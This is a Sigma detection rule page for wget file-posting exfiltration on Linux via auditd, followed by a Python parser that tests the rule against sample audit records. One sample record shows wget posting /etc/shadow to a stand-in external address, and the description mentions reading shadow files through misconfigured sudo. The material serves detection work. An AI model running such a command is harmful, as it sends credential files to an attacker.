5656c48a97
chore: rename auditd folders and others

update: Audio Capture - Updated syscall field to SYSCALL in order to make use of enriched logs
update: ASLR Disabled Via Sysctl or Direct Syscall - Linux - Updated syscall field to SYSCALL in order to make use of enriched logs
update: Clear or Disable Kernel Ring Buffer Logs via Syslog Syscall - Updated syscall field to SYSCALL in order to make use of enriched logs
update: System Info Discovery via Sysinfo Syscall - Updated syscall field to SYSCALL in order to make use of enriched logs
update: Special File Creation via Mknod Syscall - Updated syscall field to SYSCALL in order to make use of enriched logs
update: Webshell Remote Command Execution - Updated syscall field to SYSCALL in order to make use of enriched logs
28 lines
816 B
YAML
title: Data Exfiltration with Wget
id: cb39d16b-b3b6-4a7a-8222-1cf24b686ffc
status: test
description: |
    Detects attempts to post a file using the wget utility.
    An adversary can bypass permission restrictions via a misconfigured sudo permission for the wget utility, which could allow them to read files like /etc/shadow.
references:
    - https://linux.die.net/man/1/wget
    - https://gtfobins.github.io/gtfobins/wget/
author: 'Pawel Mazur'
date: 2021-11-18
modified: 2022-12-25
tags:
    - attack.exfiltration
    - attack.t1048.003
logsource:
    product: linux
    service: auditd
detection:
    selection:
        type: EXECVE
        a0: wget
        a1|startswith: '--post-file='
    condition: selection
falsepositives:
    - Legitimate usage of wget utility to post a file
level: medium
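The selection above applied to raw auditd EXECVE records, as an added example that is not part of the Sigma rule or the repository: a small Python parser run over constructed sample log lines, including the hex-encoded argv form auditd emits when an argument contains whitespace, which a naive string match on `a1` would miss.

```python
import re
from typing import Dict, List

# Constructed sample auditd EXECVE records (not taken from the page). Event 202
# is the pattern the rule describes; event 205 carries a hex-encoded a1, which
# auditd emits when an argv element contains whitespace or non-printable bytes.
SAMPLE_AUDIT_LOG = """\
type=EXECVE msg=audit(1700000000.100:201): argc=2 a0="wget" a1="https://mirror.example/pkg.tgz"
type=EXECVE msg=audit(1700000000.200:202): argc=3 a0="wget" a1="--post-file=/etc/shadow" a2="http://203.0.113.5/up"
type=EXECVE msg=audit(1700000000.300:203): argc=3 a0="curl" a1="--data-binary" a2="@/etc/passwd"
type=EXECVE msg=audit(1700000000.400:204): argc=2 a0="wget" a1="--post-data=x=1"
type=EXECVE msg=audit(1700000000.500:205): argc=3 a0="wget" a1=2D2D706F73742D66696C653D2F746D702F612062 a2="http://203.0.113.5/up"
"""

# key="quoted value" or key=bareword
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_record(line: str) -> Dict[str, str]:
    """Split one auditd record into key/value fields, decoding hex-encoded argv values."""
    fields: Dict[str, str] = {}
    for key, quoted, raw in FIELD_RE.findall(line):
        value = quoted if raw == "" else raw
        # Only aN fields are hex-encoded by auditd; never touch argc, msg, etc.
        if raw and re.fullmatch(r"a\d+", key) and re.fullmatch(r"(?:[0-9A-F]{2})+", raw):
            value = bytes.fromhex(raw).decode("utf-8", errors="replace")
        fields[key] = value
    return fields


def matches_rule(fields: Dict[str, str]) -> bool:
    """The rule's selection: type EXECVE, a0 == wget, a1 starts with '--post-file='.
    Sigma compares strings case-insensitively by default, so lower() both sides."""
    return (
        fields.get("type", "").lower() == "execve"
        and fields.get("a0", "").lower() == "wget"
        and fields.get("a1", "").lower().startswith("--post-file=")
    )


def find_matches(log_text: str) -> List[str]:
    """Return the audit event ids (the number after ':' in msg=audit(...)) that match."""
    hits = []
    for line in log_text.splitlines():
        fields = parse_record(line)
        if matches_rule(fields):
            hits.append(fields["msg"].split(":")[1].rstrip(")"))
    return hits


if __name__ == "__main__":
    print(find_matches(SAMPLE_AUDIT_LOG))  # → ['202', '205']
```

Note that `a0` holds argv[0] exactly as typed, so an invocation via a full path such as `/usr/bin/wget` would not satisfy the exact `a0: wget` selection; that is a coverage limit of the rule, not of the parser.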